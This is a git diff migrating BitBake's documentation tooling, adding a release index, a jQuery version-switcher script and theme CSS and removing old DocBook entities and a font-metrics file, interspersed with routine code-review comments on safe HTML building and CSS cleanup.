-<!ENTITY YOCTO_AB_NIGHTLY_URL "&YOCTO_AB_URL;/nightly/">
-<!ENTITY YOCTO_POKY_URL "&YOCTO_DL_URL;/releases/poky/">
-<!ENTITY YOCTO_RELEASE_DL_URL "&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;">
-<!ENTITY YOCTO_TOOLCHAIN_DL_URL "&YOCTO_RELEASE_DL_URL;/toolchain/">
-<!ENTITY YOCTO_ADTINSTALLER_DL_URL "&YOCTO_RELEASE_DL_URL;/adt_installer">
-<!ENTITY YOCTO_POKY_DL_URL "&YOCTO_RELEASE_DL_URL;/&YOCTO_POKY;.tar.bz2">
-<!ENTITY YOCTO_MACHINES_DL_URL "&YOCTO_RELEASE_DL_URL;/machines">
-<!ENTITY YOCTO_QEMU_DL_URL "&YOCTO_MACHINES_DL_URL;/qemu">
-<!ENTITY YOCTO_PYTHON-i686_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-i686.tar.bz2">
-<!ENTITY YOCTO_PYTHON-x86_64_DL_URL "&YOCTO_DL_URL;/releases/miscsupport/python-nativesdk-standalone-x86_64.tar.bz2">
-<!ENTITY YOCTO_DOCS_QS_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/yocto-project-qs/yocto-project-qs.html">
-<!ENTITY YOCTO_DOCS_ADT_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/adt-manual/adt-manual.html">
-<!ENTITY YOCTO_DOCS_REF_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/ref-manual/ref-manual.html">
-<!ENTITY YOCTO_DOCS_BSP_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/bsp-guide/bsp-guide.html">
-<!ENTITY YOCTO_DOCS_DEV_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/dev-manual/dev-manual.html">
-<!ENTITY YOCTO_DOCS_KERNEL_URL "&YOCTO_DOCS_URL;/&YOCTO_DOC_VERSION;/kernel-manual/kernel-manual.html">
-<!ENTITY YOCTO_ADTPATH_DIR "/opt/poky/&DISTRO;">
-<!ENTITY YOCTO_POKY_TARBALL "&YOCTO_POKY;.tar.bz2">
-<!ENTITY OE_INIT_PATH "&YOCTO_POKY;/oe-init-build-env">
-<!ENTITY OE_INIT_FILE "oe-init-build-env">
-<!ENTITY UBUNTU_HOST_PACKAGES_ESSENTIAL "gawk wget git-core diffstat unzip texinfo \
- build-essential chrpath">
-<!ENTITY FEDORA_HOST_PACKAGES_ESSENTIAL "gawk make wget tar bzip2 gzip python unzip perl patch \
- diffutils diffstat git cpp gcc gcc-c++ eglibc-devel texinfo chrpath \
- ccache">
-<!ENTITY OPENSUSE_HOST_PACKAGES_ESSENTIAL "python gcc gcc-c++ git chrpath make wget python-xml \
- diffstat texinfo python-curses">
-<!ENTITY CENTOS_HOST_PACKAGES_ESSENTIAL "gawk make wget tar bzip2 gzip python unzip perl patch \
- diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath">
diff --git a/bitbake/doc/releases.rst b/bitbake/doc/releases.rst
new file mode 100644
index 0000000000..d68d71599c
--- /dev/null
+++ b/bitbake/doc/releases.rst
@@ -0,0 +1,130 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+=========================
+ Current Release Manuals
+=========================
+
+****************************
+3.1 'dunfell' Release Series
+****************************
+
+- :yocto_docs:`3.1 BitBake User Manual </3.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.1.1 BitBake User Manual </3.1.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.1.2 BitBake User Manual </3.1.2/bitbake-user-manual/bitbake-user-manual.html>`
+
+==========================
+ Previous Release Manuals
+==========================
+
+*************************
+3.0 'zeus' Release Series
+*************************
+
+- :yocto_docs:`3.0 BitBake User Manual </3.0/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.0.1 BitBake User Manual </3.0.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.0.2 BitBake User Manual </3.0.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`3.0.3 BitBake User Manual </3.0.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+****************************
+2.7 'warrior' Release Series
+****************************
+
+- :yocto_docs:`2.7 BitBake User Manual </2.7/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.1 BitBake User Manual </2.7.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.2 BitBake User Manual </2.7.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.3 BitBake User Manual </2.7.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.7.4 BitBake User Manual </2.7.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+2.6 'thud' Release Series
+*************************
+
+- :yocto_docs:`2.6 BitBake User Manual </2.6/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.1 BitBake User Manual </2.6.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.2 BitBake User Manual </2.6.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.3 BitBake User Manual </2.6.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.6.4 BitBake User Manual </2.6.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+2.5 'sumo' Release Series
+*************************
+
+- :yocto_docs:`2.5 BitBake User Manual </2.5/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.5.1 BitBake User Manual </2.5.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.5.2 BitBake User Manual </2.5.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.5.3 BitBake User Manual </2.5.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+2.4 'rocko' Release Series
+**************************
+
+- :yocto_docs:`2.4 BitBake User Manual </2.4/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.1 BitBake User Manual </2.4.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.2 BitBake User Manual </2.4.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.3 BitBake User Manual </2.4.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.4 BitBake User Manual </2.4.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+2.3 'pyro' Release Series
+*************************
+
+- :yocto_docs:`2.3 BitBake User Manual </2.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.1 BitBake User Manual </2.3.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.2 BitBake User Manual </2.3.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.3 BitBake User Manual </2.3.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.4 BitBake User Manual </2.3.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+2.2 'morty' Release Series
+**************************
+
+- :yocto_docs:`2.2 BitBake User Manual </2.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.2.1 BitBake User Manual </2.2.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.2.2 BitBake User Manual </2.2.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.2.3 BitBake User Manual </2.2.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+****************************
+2.1 'krogoth' Release Series
+****************************
+
+- :yocto_docs:`2.1 BitBake User Manual </2.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.1.1 BitBake User Manual </2.1.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.1.2 BitBake User Manual </2.1.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.1.3 BitBake User Manual </2.1.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+***************************
+2.0 'jethro' Release Series
+***************************
+
+- :yocto_docs:`1.9 BitBake User Manual </1.9/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0 BitBake User Manual </2.0/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0.1 BitBake User Manual </2.0.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0.2 BitBake User Manual </2.0.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0.3 BitBake User Manual </2.0.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+1.8 'fido' Release Series
+*************************
+
+- :yocto_docs:`1.8 BitBake User Manual </1.8/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.8.1 BitBake User Manual </1.8.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.8.2 BitBake User Manual </1.8.2/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+1.7 'dizzy' Release Series
+**************************
+
+- :yocto_docs:`1.7 BitBake User Manual </1.7/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.7.1 BitBake User Manual </1.7.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.7.2 BitBake User Manual </1.7.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.7.3 BitBake User Manual </1.7.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+1.6 'daisy' Release Series
+**************************
+
+- :yocto_docs:`1.6 BitBake User Manual </1.6/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.6.1 BitBake User Manual </1.6.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.6.2 BitBake User Manual </1.6.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.6.3 BitBake User Manual </1.6.3/bitbake-user-manual/bitbake-user-manual.html>`
+
diff --git a/bitbake/doc/sphinx-static/switchers.js b/bitbake/doc/sphinx-static/switchers.js
new file mode 100644
index 0000000000..32113cfa96
--- /dev/null
+++ b/bitbake/doc/sphinx-static/switchers.js
@@ -0,0 +1,233 @@
+(function() {
+ 'use strict';
+
+ var all_versions = {
+ 'dev': 'dev (3.2)',
+ '3.1.2': '3.1.2',
+ '3.0.3': '3.0.3',
+ '2.7.4': '2.7.4',
+ };
+
+ var all_doctypes = {
+ 'single': 'Individual Webpages',
+ 'mega': "All-in-one 'Mega' Manual",
+ };
+
+ // Simple version comparision
+ // Return 1 if a > b
+ // Return -1 if a < b
+ // Return 0 if a == b
+ function ver_compare(a, b) {
+ if (a == "dev") {
+ return 1;
+ }
+
+ if (a === b) {
+ return 0;
+ }
+
+ var a_components = a.split(".");
+ var b_components = b.split(".");
+
+ var len = Math.min(a_components.length, b_components.length);
+
+ // loop while the components are equal
+ for (var i = 0; i < len; i++) {
+ // A bigger than B
+ if (parseInt(a_components[i]) > parseInt(b_components[i])) {
+ return 1;
+ }
+
+ // B bigger than A
+ if (parseInt(a_components[i]) < parseInt(b_components[i])) {
+ return -1;
+ }
+ }
+
+ // If one's a prefix of the other, the longer one is greater.
+ if (a_components.length > b_components.length) {
+ return 1;
+ }
+
+ if (a_components.length < b_components.length) {
+ return -1;
+ }
+
+ // Otherwise they are the same.
+ return 0;
+ }
+
+ function build_version_select(current_series, current_version) {
+ var buf = ['<select>'];
+
+ $.each(all_versions, function(version, title) {
+ var series = version.substr(0, 3);
+ if (series == current_series) {
+ if (version == current_version)
+ buf.push('<option value="' + version + '" selected="selected">' + title + '</option>');
+ else
+ buf.push('<option value="' + version + '">' + title + '</option>');
+
+ if (version != current_version)
+ buf.push('<option value="' + current_version + '" selected="selected">' + current_version + '</option>');
+ } else {
+ buf.push('<option value="' + version + '">' + title + '</option>');
+ }
+ });
+
+ buf.push('</select>');
+ return buf.join('');
+ }
+
+ function build_doctype_select(current_doctype) {
+ var buf = ['<select>'];
+
+ $.each(all_doctypes, function(doctype, title) {
+ if (doctype == current_doctype)
+ buf.push('<option value="' + doctype + '" selected="selected">' +
+ all_doctypes[current_doctype] + '</option>');
+ else
+ buf.push('<option value="' + doctype + '">' + title + '</option>');
+ });
+ if (!(current_doctype in all_doctypes)) {
+ // In case we're browsing a doctype that is not yet in all_doctypes.
+ buf.push('<option value="' + current_doctype + '" selected="selected">' +
+ current_doctype + '</option>');
+ all_doctypes[current_doctype] = current_doctype;
+ }
+ buf.push('</select>');
+ return buf.join('');
+ }
+
+ function navigate_to_first_existing(urls) {
+ // Navigate to the first existing URL in urls.
+ var url = urls.shift();
+
+ // Web browsers won't redirect file:// urls to file urls using ajax but
+ // its useful for local testing
+ if (url.startsWith("file://")) {
+ window.location.href = url;
+ return;
+ }
+
+ if (urls.length == 0) {
+ window.location.href = url;
+ return;
+ }
+ $.ajax({
+ url: url,
+ success: function() {
+ window.location.href = url;
+ },
+ error: function() {
+ navigate_to_first_existing(urls);
+ }
+ });
+ }
+
+ function get_docroot_url() {
+ var url = window.location.href;
+ var root = DOCUMENTATION_OPTIONS.URL_ROOT;
+
+ var urlarray = url.split('/');
+ // Trim off anything after '/'
+ urlarray.pop();
+ var depth = (root.match(/\.\.\//g) || []).length;
+ for (var i = 0; i < depth; i++) {
+ urlarray.pop();
+ }
+
+ return urlarray.join('/') + '/';
+ }
+
+ function on_version_switch() {
+ var selected_version = $(this).children('option:selected').attr('value');
+ var url = window.location.href;
+ var current_version = DOCUMENTATION_OPTIONS.VERSION;
+ var docroot = get_docroot_url()
+
+ var new_versionpath = selected_version + '/';
+ if (selected_version == "dev")
+ new_versionpath = '';
+
+ // dev versions have no version prefix
+ if (current_version == "dev") {
+ var new_url = docroot + new_versionpath + url.replace(docroot, "");
+ var fallback_url = docroot + new_versionpath;
+ } else {
+ var new_url = url.replace('/' + current_version + '/', '/' + new_versionpath);
+ var fallback_url = new_url.replace(url.replace(docroot, ""), "");
+ }
+
+ console.log(get_docroot_url())
+ console.log(url + " to url " + new_url);
+ console.log(url + " to fallback " + fallback_url);
+
+ if (new_url != url) {
+ navigate_to_first_existing([
+ new_url,
+ fallback_url,
+ 'https://www.yoctoproject.org/docs/',
+ ]);
+ }
+ }
+
+ function on_doctype_switch() {
+ var selected_doctype = $(this).children('option:selected').attr('value');
+ var url = window.location.href;
+ if (selected_doctype == 'mega') {
+ var docroot = get_docroot_url()
+ var current_version = DOCUMENTATION_OPTIONS.VERSION;
+ // Assume manuals before 3.2 are using old docbook mega-manual
+ if (ver_compare(current_version, "3.2") < 0) {
+ var new_url = docroot + "mega-manual/mega-manual.html";
+ } else {
+ var new_url = docroot + "singleindex.html";
+ }
+ } else {
+ var new_url = url.replace("singleindex.html", "index.html")
+ }
+
+ if (new_url != url) {
+ navigate_to_first_existing([
+ new_url,
+ 'https://www.yoctoproject.org/docs/',
+ ]);
+ }
+ }
+
+ // Returns the current doctype based upon the url
+ function doctype_segment_from_url(url) {
+ if (url.includes("singleindex") || url.includes("mega-manual"))
+ return "mega";
+ return "single";
+ }
+
+ $(document).ready(function() {
+ var release = DOCUMENTATION_OPTIONS.VERSION;
+ var current_doctype = doctype_segment_from_url(window.location.href);
+ var current_series = release.substr(0, 3);
+ var version_select = build_version_select(current_series, release);
+
+ $('.version_switcher_placeholder').html(version_select);
+ $('.version_switcher_placeholder select').bind('change', on_version_switch);
+
+ var doctype_select = build_doctype_select(current_doctype);
+
+ $('.doctype_switcher_placeholder').html(doctype_select);
+ $('.doctype_switcher_placeholder select').bind('change', on_doctype_switch);
+
+ if (ver_compare(release, "3.1") < 0) {
+ $('#outdated-warning').html('Version ' + release + ' of the project is now considered obsolete, please select and use a more recent version');
+ $('#outdated-warning').css('padding', '.5em');
+ } else if (release != "dev") {
+ $.each(all_versions, function(version, title) {
+ var series = version.substr(0, 3);
+ if (series == current_series && version != release) {
+ $('#outdated-warning').html('This document is for outdated version ' + release + ', you should select the latest release version in this series, ' + version + '.');
+ $('#outdated-warning').css('padding', '.5em');
+ }
+ });
+ }
+ });
+})();
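Review bot: The `#outdated-warning` messages at the end of the ready handler are built by string concatenation and written with `.html()`, and `build_version_select` builds `<option>` markup the same way, so any markup character in `DOCUMENTATION_OPTIONS.VERSION` would be parsed as HTML. That value is defined outside this file (presumably generated at docs build time), so the exposure is likely low, but the script should not depend on it being clean. The messages carry no markup, so `.text()` is enough: `$('#outdated-warning').text('Version ' + release + ' of the project is now considered obsolete, please select and use a more recent version');`, and likewise for the second message. In `build_version_select` the options could be created with `$('<option>').val(version).text(title)` instead of concatenated strings. Separately, the three `console.log` calls in `on_version_switch` look like leftover debugging and could be removed.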
diff --git a/bitbake/doc/sphinx-static/theme_overrides.css b/bitbake/doc/sphinx-static/theme_overrides.css
new file mode 100644
index 0000000000..e362677a7f
--- /dev/null
+++ b/bitbake/doc/sphinx-static/theme_overrides.css
@@ -0,0 +1,162 @@
+/*
+ SPDX-License-Identifier: CC-BY-2.0-UK
+*/
+
+body {
+ font-family: Verdana, Sans, sans-serif;
+ margin: 0em auto;
+ color: #333;
+}
+
+h1,h2,h3,h4,h5,h6,h7 {
+ font-family: Arial, Sans;
+ color: #00557D;
+ clear: both;
+}
+
+h1 {
+ font-size: 2em;
+ text-align: left;
+ padding: 0em 0em 0em 0em;
+ margin: 2em 0em 0em 0em;
+}
+
+h2.subtitle {
+ margin: 0.10em 0em 3.0em 0em;
+ padding: 0em 0em 0em 0em;
+ font-size: 1.8em;
+ padding-left: 20%;
+ font-weight: normal;
+ font-style: italic;
+}
+
+h2 {
+ margin: 2em 0em 0.66em 0em;
+ padding: 0.5em 0em 0em 0em;
+ font-size: 1.5em;
+ font-weight: bold;
+}
+
+h3.subtitle {
+ margin: 0em 0em 1em 0em;
+ padding: 0em 0em 0em 0em;
+ font-size: 142.14%;
+ text-align: right;
+}
+
+h3 {
+ margin: 1em 0em 0.5em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 140%;
+ font-weight: bold;
+}
+
+h4 {
+ margin: 1em 0em 0.5em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 120%;
+ font-weight: bold;
+}
+
+h5 {
+ margin: 1em 0em 0.5em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 110%;
+ font-weight: bold;
+}
+
+h6 {
+ margin: 1em 0em 0em 0em;
+ padding: 1em 0em 0em 0em;
+ font-size: 110%;
+ font-weight: bold;
+}
+
+em {
+ font-weight: bold;
+}
+
+.pre {
+ font-size: medium;
+ font-family: Courier, monospace;
+}
+
+.wy-nav-content a {
+ text-decoration: underline;
+ color: #444;
+ background: transparent;
+}
+
+.wy-nav-content a:hover {
+ text-decoration: underline;
+ background-color: #dedede;
+}
+
+.wy-nav-content a:visited {
+ color: #444;
+}
+
+[alt='Permalink'] { color: #eee; }
+[alt='Permalink']:hover { color: black; }
+
+@media screen {
+ /* content column
+ *
+ * RTD theme's default is 800px as max width for the content, but we have
+ * tables with tons of columns, which need the full width of the view-port.
+ */
+
+ .wy-nav-content{max-width: none; }
+
+ /* inline literal: drop the borderbox, padding and red color */
+ code, .rst-content tt, .rst-content code {
+ color: inherit;
+ border: none;
+ padding: unset;
+ background: inherit;
+ font-size: 85%;
+ }
+
+ .rst-content tt.literal,.rst-content tt.literal,.rst-content code.literal {
+ color: inherit;
+ }
+
+ /* Admonition should be gray, not blue or green */
+ .rst-content .note .admonition-title,
+ .rst-content .tip .admonition-title,
+ .rst-content .warning .admonition-title,
+ .rst-content .caution .admonition-title,
+ .rst-content .important .admonition-title {
+ background: #f0f0f2;
+ color: #00557D;
+
+ }
+
+ .rst-content .note,
+ .rst-content .tip,
+ .rst-content .important,
+ .rst-content .warning,
+ .rst-content .caution {
+ background: #f0f0f2;
+ }
+
+ /* Remove the icon in front of note/tip element, and before the logo */
+ .icon-home:before, .rst-content .admonition-title:before {
+ display: none
+ }
+
+ /* a custom informalexample container is used in some doc */
+ .informalexample {
+ border: 1px solid;
+ border-color: #aaa;
+ margin: 1em 0em;
+ padding: 1em;
+ page-break-inside: avoid;
+ }
+
+ /* Remove the blue background in the top left corner, around the logo */
+ .wy-side-nav-search {
+ background: inherit;
+ }
+
+}
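Review bot: The selector list `.rst-content tt.literal,.rst-content tt.literal,.rst-content code.literal` inside the `@media screen` block repeats `.rst-content tt.literal`, so one of the two can be dropped: `.rst-content tt.literal, .rst-content code.literal {`. The heading rule near the top of the file also lists `h7`, which is not an HTML element, so that selector never matches.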
diff --git a/bitbake/doc/template/Vera.xml b/bitbake/doc/template/Vera.xml
deleted file mode 100644
index 3c82043e35..0000000000
--- a/bitbake/doc/template/Vera.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics type="TYPE0"><font-name>BitstreamVeraSans</font-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>928</ascender><descender>-235</descender><bbox><left>-183</left><bottom>-235</bottom><right>1287</right><top>928</top></bbox><flags>32</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" 
ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" 
us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="600"/><wx w="0"/><wx w="317"/><wx w="317"/><wx w="400"/><wx w="459"/><wx w="837"/><wx w="636"/><wx w="950"/><wx w="779"/><wx w="274"/><wx w="390"/><wx w="390"/><wx w="500"/><wx w="837"/><wx w="317"/><wx w="360"/><wx w="317"/><wx w="336"/><wx 
w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="336"/><wx w="336"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="530"/><wx w="1000"/><wx w="684"/><wx w="686"/><wx w="698"/><wx w="770"/><wx w="631"/><wx w="575"/><wx w="774"/><wx w="751"/><wx w="294"/><wx w="294"/><wx w="655"/><wx w="557"/><wx w="862"/><wx w="748"/><wx w="787"/><wx w="603"/><wx w="787"/><wx w="694"/><wx w="634"/><wx w="610"/><wx w="731"/><wx w="684"/><wx w="988"/><wx w="685"/><wx w="610"/><wx w="685"/><wx w="390"/><wx w="336"/><wx w="390"/><wx w="837"/><wx w="500"/><wx w="500"/><wx w="612"/><wx w="634"/><wx w="549"/><wx w="634"/><wx w="615"/><wx w="352"/><wx w="634"/><wx w="633"/><wx w="277"/><wx w="277"/><wx w="579"/><wx w="277"/><wx w="974"/><wx w="633"/><wx w="611"/><wx w="634"/><wx w="634"/><wx w="411"/><wx w="520"/><wx w="392"/><wx w="633"/><wx w="591"/><wx w="817"/><wx w="591"/><wx w="591"/><wx w="524"/><wx w="636"/><wx w="336"/><wx w="636"/><wx w="837"/><wx w="684"/><wx w="684"/><wx w="698"/><wx w="631"/><wx w="748"/><wx w="787"/><wx w="731"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="549"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="633"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="500"/><wx w="500"/><wx w="636"/><wx w="636"/><wx w="500"/><wx w="589"/><wx w="636"/><wx w="629"/><wx w="1000"/><wx w="1000"/><wx w="1000"/><wx w="500"/><wx w="500"/><wx w="837"/><wx w="974"/><wx w="787"/><wx w="833"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="636"/><wx w="636"/><wx w="517"/><wx 